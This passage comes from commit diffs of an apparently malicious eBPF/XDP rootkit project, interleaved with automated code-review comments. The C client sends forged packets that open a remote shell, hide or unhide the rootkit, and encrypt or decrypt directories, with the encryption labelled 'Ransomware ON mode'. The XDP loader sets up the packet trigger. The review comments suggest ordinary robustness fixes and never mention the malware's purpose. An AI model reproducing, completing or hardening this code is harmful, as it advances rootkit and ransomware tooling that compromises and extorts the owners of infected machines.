printf("["KBLU"INFO"RESET"]""Sending malicious packet to infected machine...\n");
//Sending the malicious payload
if(rawsocket_send(packet)<0){
printf("["KRED"ERROR"RESET"]""An error occured. Is the machine up?\n");
}else{
printf("["KGRN"OK"RESET"]""Request to decrypt directory successfully sent!\n");
}
free(local_ip);
}
void main(int argc, char* argv[]){
if(argc<2){
printf("["KRED"ERROR"RESET"]""Invalid number of arguments\n");
print_help_dialog(argv[0]);
return;
}
int ENCRYPT_MODE_SEL = 0;
int DECRYPT_MODE_SEL = 0;
int PATH_ARG_PROVIDED = 0;
int PARAM_MODULE_ACTIVATED = 0;
int opt;
char dest_address[32];
char path_arg[512];
//Command line argument parsing
while ((opt = getopt(argc, argv, ":S:h")) != -1) {
switch (opt) {
case 'S':
print_welcome_message();
sleep(1);
//Send a secret message
printf("["KBLU"INFO"RESET"]""Activated SEND a SECRET mode\n");
//printf("Option S has argument %s\n", optarg);
strcpy(dest_address, optarg);
get_shell(dest_address);
PARAM_MODULE_ACTIVATED = 1;
break;
/*case 'u':
print_welcome_message();
sleep(1);
//Selecting show rootkit - Unhide mode
printf("["KBLU"INFO"RESET"]""Selected UNHIDE the rootkit remotely\n");
//printf("Option m has argument %s\n", optarg);
strcpy(dest_address, optarg);
show_rootkit(dest_address);
PARAM_MODULE_ACTIVATED = 1;
break;
case 'i':
print_welcome_message();
sleep(1);
//Selecting hide rootkit - Invisible mode
printf("["KBLU"INFO"RESET"]""Selected HIDE the rootkit remotely\n");
//printf("Option m has argument %s\n", optarg);
strcpy(dest_address, optarg);
hide_rootkit(dest_address);
PARAM_MODULE_ACTIVATED = 1;
case 'e':
ENCRYPT_MODE_SEL = 1;
strcpy(dest_address, optarg);
break;
case 'd':
DECRYPT_MODE_SEL = 1;
strcpy(dest_address, optarg);
break;
case 'p':
PATH_ARG_PROVIDED = 1;
strcpy(path_arg, optarg);
break;*/
case 'h':
print_help_dialog(argv[0]);
exit(0);
break;
case '?':
printf("["KRED"ERROR"RESET"]""Unknown option: %c\n", optopt);
break;
case ':':
printf("["KRED"ERROR"RESET"]""Missing arguments for %c\n", optopt);
exit(EXIT_FAILURE);
break;
default:
print_help_dialog(argv[0]);
exit(EXIT_FAILURE);
}
}
//Checking activated mode, for those requiring multiple args
if(ENCRYPT_MODE_SEL == 1 && PATH_ARG_PROVIDED == 1){
print_welcome_message();
sleep(1);
//Selecting encrypt directory - Ransomware ON mode
printf("["KBLU"INFO"RESET"]""Selected ENCRYPT a rootkit remotely\n");
encrypt_directory(dest_address, path_arg);
}else if(DECRYPT_MODE_SEL == 1 && PATH_ARG_PROVIDED == 1){
print_welcome_message();
sleep(1);
//Selecting encrypt directory - Ransomware ON mode
printf("["KBLU"INFO"RESET"]""Selected DECRYPT a rootkit remotely\n");
decrypt_directory(dest_address, path_arg);
}else if(PARAM_MODULE_ACTIVATED==0){
printf("["KRED"ERROR"RESET"]""Invalid parameters\n");
print_help_dialog(argv[0]);
exit(EXIT_FAILURE);
}
}
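Review bot: In `main`, `strcpy(dest_address, optarg)` copies a command-line argument of arbitrary length into the 32-byte `dest_address` stack buffer, so any argument of 32 characters or more writes past it; the commented-out cases repeat the pattern, and `encrypt_directory`/`decrypt_directory` use unbounded `strcpy`/`strcat` into `data_buffer[1024]`. Bound the copy and reject oversized input, e.g. `if (snprintf(dest_address, sizeof dest_address, "%s", optarg) >= (int)sizeof dest_address) exit(EXIT_FAILURE);`. `check_ip_address_format` declares `char* buf[256]` where `inet_pton(AF_INET, ...)` expects a `struct in_addr`, and it only prints a warning, so a malformed address is still handed to `build_standard_packet`; it should return the result and the callers should stop on failure. `main` is declared `void` and should be `int main(int argc, char *argv[])` with an explicit return value.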

BIN
src/client/client.o Normal file

Binary file not shown.

BIN
src/client/injector Executable file

Binary file not shown.

35
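--- a/src/client/lib/RawTCP.h
+++ b/src/client/lib/RawTCP.h
@@ -0,0 +1,35 @@
+#ifndef HEADER_RAWTCP_LIB
+#define HEADER_RAWTCP_LIB
+#include <stdlib.h>
+//Packet_t structure
+typedef struct packet_t{
+struct iphdr *ipheader;
+struct tcphdr *tcpheader;
+char *payload;
+int payload_length;
+char* packet;
+}packet_t;
+//PacketForger headers
+packet_t build_standard_packet(
+u_int16_t source_port,
+u_int16_t destination_port,
+const char* source_ip_address,
+const char* destination_ip_address,
+u_int32_t packet_length,
+char* payload
+);
+int packet_destroy(packet_t packet);
+int set_TCP_flags(packet_t packet, int hex_flags);
+//SocketManager headers
+int rawsocket_send(packet_t packet);
+packet_t rawsocket_sniff();
+#endif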
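Review bot: The header uses `struct iphdr`, `struct tcphdr`, `u_int16_t` and `u_int32_t` but includes only `<stdlib.h>`, so it compiles only where that header happens to expose the BSD integer typedefs, and the two struct types stay incomplete for every includer. Making it self-contained takes three lines: `#include <sys/types.h>`, `#include <netinet/ip.h>`, `#include <netinet/tcp.h>`. `packet_t` is passed by value while carrying four pointers, and nothing states who frees them; a comment on `build_standard_packet` saying that the caller must release the result with `packet_destroy` would help, since client.c in this commit never calls it. `rawsocket_sniff()` should be declared `rawsocket_sniff(void)`, and `payload` should be `const char*` because callers pass string literals.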

Binary file not shown.


@@ -1,6 +1,6 @@
// SPDX-License-Identifier: GPL-2.0 OR BSD-3-Clause // SPDX-License-Identifier: GPL-2.0 OR BSD-3-Clause
/* Copyright (c) 2020 Facebook */ /* Copyright (c) 2020 Facebook */
#include "vmlinux.h" #include "../vmlinux/vmlinux.h"
#include <bpf/bpf_helpers.h> #include <bpf/bpf_helpers.h>
#include <bpf/bpf_tracing.h> #include <bpf/bpf_tracing.h>
#include <bpf/bpf_core_read.h> #include <bpf/bpf_core_read.h>


@@ -24,19 +24,19 @@
char LICENSE[] SEC("license") = "Dual BSD/GPL"; char LICENSE[] SEC("license") = "Dual BSD/GPL";
/*//BPF map //BPF map
struct { /*struct {
__uint(type, BPF_MAP_TYPE_HASH); __uint(type, BPF_MAP_TYPE_HASH);
__uint(max_entries, 8192); __uint(max_entries, 8192);
__type(key, pid_t); __type(key, pid_t);
__type(value, uint64_t); __type(value, char[5]);
} exec_start SEC(".maps");*/ } exec_start SEC(".maps");*/
//Ring buffer //Ring buffer
struct { /*struct {
__uint(type, BPF_MAP_TYPE_RINGBUF); __uint(type, BPF_MAP_TYPE_RINGBUF);
__uint(max_entries, 256 * 1024); __uint(max_entries, 256 * 1024);
} rb SEC(".maps"); } rb SEC(".maps");*/
//Ethernet frame struct //Ethernet frame struct
struct eth_hdr { struct eth_hdr {
@@ -45,9 +45,11 @@ struct eth_hdr {
unsigned short h_proto; unsigned short h_proto;
}; };
SEC("xdp") SEC("xdp_prog")
int xdp_receive(struct xdp_md *ctx) int xdp_receive(struct xdp_md *ctx)
{ {
bpf_printk("BPF triggered\n");
void *data_end = (void *)(long)ctx->data_end; void *data_end = (void *)(long)ctx->data_end;
void *data = (void *)(long)ctx->data; void *data = (void *)(long)ctx->data;
char match_pattern[] = "test"; char match_pattern[] = "test";
@@ -57,10 +59,10 @@ int xdp_receive(struct xdp_md *ctx)
struct udphdr *udp; struct udphdr *udp;
struct iphdr *ip; struct iphdr *ip;
struct event *rb_event; /*struct event *rb_event;
/* Reserve a ring buffer event from BPF ringbuf to be filled later*/ Reserve a ring buffer event from BPF ringbuf to be filled later*/
/*rb_event = bpf_ringbuf_reserve(&rb, sizeof(*rb_event), 0); /*rb_event = bpf_ringbuf_reserve(&rb, sizeof(struct event), 0);
if (!rb_event) if (!rb_event)
return 0;*/ return 0;*/
@@ -92,11 +94,13 @@ int xdp_receive(struct xdp_md *ctx)
if ((void *)payload + payload_size > data_end) if ((void *)payload + payload_size > data_end)
return XDP_PASS; return XDP_PASS;
// Compare each byte, exit if a difference is found. // Compare each byte, exit if a difference is found.
for (i = 0; i < payload_size; i++) for (i = 0; i < payload_size; i++)
if (payload[i] != match_pattern[i]) if (payload[i] != match_pattern[i])
return XDP_PASS; return XDP_PASS;
bpf_printk("BPF finished\n ");
/*if(!payload){ /*if(!payload){
bpf_probe_read_str(&rb_event->payload, sizeof(rb_event->payload), (void *)payload); bpf_probe_read_str(&rb_event->payload, sizeof(rb_event->payload), (void *)payload);
bpf_ringbuf_submit(rb_event, 0); bpf_ringbuf_submit(rb_event, 0);
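Review bot: The `bpf_printk("BPF triggered\n")` line at the top of `xdp_receive` runs for every frame the hook sees, before any header parsing, so on a busy interface it fills the shared kernel trace buffer and adds a helper call to each packet. The second call after the compare loop fires only on a match and is the more useful trace; its format string also has a stray space after the newline. Wrapping the entry trace in a compile-time switch, `#ifdef DEBUG` / `bpf_printk("BPF triggered\n");` / `#endif`, keeps it out of normal builds. If the right-hand column is the new side, `SEC("xdp_prog")` relies on libbpf's loose matching of section names, which later libbpf releases reject as far as I know, so `SEC("xdp")` is the safer spelling. `xdp_receive` starts and continues outside the hunks shown.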


@@ -4,8 +4,10 @@
#include <signal.h> #include <signal.h>
#include <sys/resource.h> #include <sys/resource.h>
#include <bpf/libbpf.h> #include <bpf/libbpf.h>
#include <linux/if_link.h>
#include "xdp_filter.skel.h" #include "xdp_filter.skel.h"
#include "xdp_filter.h" #include "xdp_filter.h"
#include <net/if.h>
static struct env { static struct env {
bool verbose; bool verbose;
@@ -76,7 +78,7 @@ static void sig_handler(int sig){
exiting = true; exiting = true;
} }
static int handle_event(void *ctx, void *data, size_t data_sz){ /*static int handle_event(void *ctx, void *data, size_t data_sz){
const struct event *e = data; const struct event *e = data;
struct tm *tm; struct tm *tm;
char ts[32]; char ts[32];
@@ -90,18 +92,20 @@ static int handle_event(void *ctx, void *data, size_t data_sz){
e->payload); e->payload);
return 0; return 0;
} }*/
int main(int argc, char**argv){ int main(int argc, char**argv){
struct ring_buffer *rb = NULL; //struct ring_buffer *rb = NULL;
struct xdp_filter_bpf *skel; struct xdp_filter_bpf *skel;
int err; int err;
unsigned int ifindex = if_nametoindex(argv[1]);
/* Parse command line arguments */ /* Parse command line arguments */
err = argp_parse(&argp, argc, argv, 0, NULL, NULL); /*err = argp_parse(&argp, argc, argv, 0, NULL, NULL);
if (err) if (err)
return err; return err;*/
/* Set up libbpf errors and debug info callback */ /* Set up libbpf errors and debug info callback */
libbpf_set_print(libbpf_print_fn); libbpf_set_print(libbpf_print_fn);
@@ -134,19 +138,24 @@ int main(int argc, char**argv){
goto cleanup; goto cleanup;
} }
int flags = XDP_FLAGS_SKB_MODE;
int fd = bpf_program__fd(skel->progs.xdp_receive);
err = bpf_set_link_xdp_fd(ifindex, fd, flags);
/* Set up ring buffer polling */ /* Set up ring buffer polling */
rb = ring_buffer__new(bpf_map__fd(skel->maps.rb), handle_event, NULL, NULL); /*rb = ring_buffer__new(bpf_map__fd(skel->maps.rb), handle_event, NULL, NULL);
if (!rb) { if (!rb) {
err = -1; err = -1;
fprintf(stderr, "Failed to create ring buffer\n"); fprintf(stderr, "Failed to create ring buffer\n");
goto cleanup; goto cleanup;
} }*/
/* Process events */ /* Process events */
printf("%-8s %-5s %-16s %-7s %-7s %s\n", printf("%-8s %-5s %-16s %-7s %-7s %s\n",
"TIME", "EVENT", "COMM", "PID", "PPID", "FILENAME/EXIT CODE"); "TIME", "EVENT", "COMM", "PID", "PPID", "FILENAME/EXIT CODE");
while (!exiting) { while (!exiting) {
err = ring_buffer__poll(rb, 100 /* timeout, ms */); //err = ring_buffer__poll(rb, 100 /* timeout, ms */);
/* Ctrl-C will cause -EINTR */ /* Ctrl-C will cause -EINTR */
if (err == -EINTR) { if (err == -EINTR) {
err = 0; err = 0;
@@ -158,9 +167,12 @@ int main(int argc, char**argv){
} }
} }
fd = -1;
err = bpf_set_link_xdp_fd(ifindex, fd, flags);
cleanup: cleanup:
/* Clean up */ /* Clean up */
ring_buffer__free(rb); //ring_buffer__free(rb);
xdp_filter_bpf__destroy(skel); xdp_filter_bpf__destroy(skel);
return err < 0 ? -err : 0; return err < 0 ? -err : 0;
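Review bot: `if_nametoindex(argv[1])` at the top of `main` reads `argv[1]` without checking `argc`, and with the `argp_parse` call commented out nothing else validates the command line, so running the loader with no argument passes a null pointer and a mistyped interface name yields index 0 that is used unchecked. The return value of the first `bpf_set_link_xdp_fd` call is stored in `err` but never tested, so a failed attach falls through to the event loop as if it had succeeded. With `ring_buffer__poll` commented out, the visible part of the `while (!exiting)` loop has no blocking call, which looks like a busy spin; part of the loop body is outside the hunks shown, so confirm. `main` starts and continues outside these hunks; the sketch below shows only the added checks.

```c
int main(int argc, char**argv){
    // … unchanged: skel and err declarations …
    if (argc < 2) {
        fprintf(stderr, "usage: %s <ifname>\n", argv[0]);
        return 1;
    }
    unsigned int ifindex = if_nametoindex(argv[1]);
    if (ifindex == 0) {
        perror("if_nametoindex");
        return 1;
    }
    // … unchanged: libbpf setup, skeleton open and load …
    err = bpf_set_link_xdp_fd(ifindex, fd, flags);
    if (err < 0) {
        fprintf(stderr, "Failed to attach XDP program\n");
        goto cleanup;
    }
    // … unchanged: event loop, detach and cleanup …
```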


@@ -5,7 +5,7 @@
struct event { struct event {
char payload[MAX_PAYLOAD_LEN]; char payload[MAX_PAYLOAD_LEN];
bool exit_event; //bool exit_event;
}; };
#endif #endif